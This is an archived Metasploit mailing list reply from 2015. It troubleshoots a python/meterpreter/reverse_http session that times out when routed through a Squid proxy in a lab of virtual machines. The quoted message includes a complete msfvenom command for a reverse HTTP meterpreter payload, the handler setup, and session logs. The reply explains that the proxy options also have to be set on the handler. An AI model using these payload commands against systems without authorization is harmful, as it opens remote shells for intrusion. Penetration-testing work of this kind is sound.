Metasploit mailing list archives
Re: framework Digest, Vol 83, Issue 1
From: Spencer McIntyre <zerosteiner () gmail com>
Date: Tue, 03 Mar 2015 18:47:31 +0000
Mike Jones! The PROXYHOST and PROXYPORT must also be set in the handler. This is because when the stage is sent, the proxy settings are patched in by the instance of Metasploit running on the attackers system when it is requested by the stager. Because of this, it's necessary to set the PROXYHOST and PROXYPORT options to the same values on the handler as was specified when creating the payload with msfvenom. If when the proxy options are set the session still does not respond, it's possible there is another issue and opening a ticket on GitHub with the output would be helpful for tracking. https://github.com/rapid7/metasploit-framework/issues I hope that helps Mike Jones! On Tue, Mar 3, 2015 at 1:00 PM <framework-request () spool metasploit com> wrote:
Send framework mailing list submissions to framework () spool metasploit com To subscribe or unsubscribe via the World Wide Web, visit https://dev.metasploit.com/mailman/listinfo/framework or, via email, send a message with subject or body 'help' to framework-request () spool metasploit com You can reach the person managing the list at framework-owner () spool metasploit com When replying, please edit your Subject line so it is more specific than "Re: Contents of framework digest..." Today's Topics: 1. python/meterpreter/reverse_http timeout (Mike Jones!) ---------------------------------------------------------------------- Message: 1 Date: Mon, 2 Mar 2015 12:35:01 -0800 From: "Mike Jones!" <property.of.mike.jones () gmail com> To: framework <framework () spool metasploit com> Subject: [framework] python/meterpreter/reverse_http timeout Message-ID: <CAGZNKFsAxyymTa=LBa9KrK+JxeceyLT6nUU1wrhWXzxiU7YtEQ@mail. gmail.com> Content-Type: text/plain; charset="utf-8" I'm testing payloads through a proxy in my VMs and can't get any meterpreter commands to work after the session opens. All VMs are running Debian. Victim: 10.17.24.128 Proxy: 10.17.24.10 and 172.16.22.10 (running Squid) Attacker: 172.16.22.22 I've generated a payload with msfvenom: msfvenom -p python/meterpreter/reverse_http LHOST=172.16.22.22 LPORT=8080 PROXYHOST=10.17.24.10 PROXYPORT=3128 Set up a handler: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD python/meterpreter/reverse_http PAYLOAD => python/meterpreter/reverse_http msf exploit(handler) > set LHOST 172.16.22.22 LHOST => 172.16.22.22 msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > exploit -j Executing the payload on the victim looks fine. Session hits on metasploit, and I can interact with it but none of the commands respond: msf exploit(handler) > [*] 172.16.22.10:52399 Request received for /x5LW... [*] Meterpreter session 1 opened (172.16.22.22:8080 -> 172.16.22.10:52399) at 2015-03-02 14:12:10 -0600 sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter python/python 172.16.22.22:8080 -> 172.16.22.10:52399 (172.16.22.10) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ps [-] Error running command ps: Rex::TimeoutError Operation timed out. I tried setting up the handler with and without PROXYHOST and PROXYPORT, neither way worked, though I suspect without those values is the correct approach. What am I missing? Thanks in advance. -------------- next part -------------- An HTML attachment was scrubbed... URL: <https://dev.metasploit.com/pipermail/framework/attachments/ 20150302/3f873c79/attachment-0001.html> ------------------------------ Subject: Digest Footer _______________________________________________ framework mailing list framework () spool metasploit com https://dev.metasploit.com/mailman/listinfo/framework ------------------------------ End of framework Digest, Vol 83, Issue 1 ****************************************
_______________________________________________ https://dev.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: framework Digest, Vol 83, Issue 1 Spencer McIntyre (Mar 03)
- Re: framework Digest, Vol 83, Issue 1 Mike Jones! (Mar 03)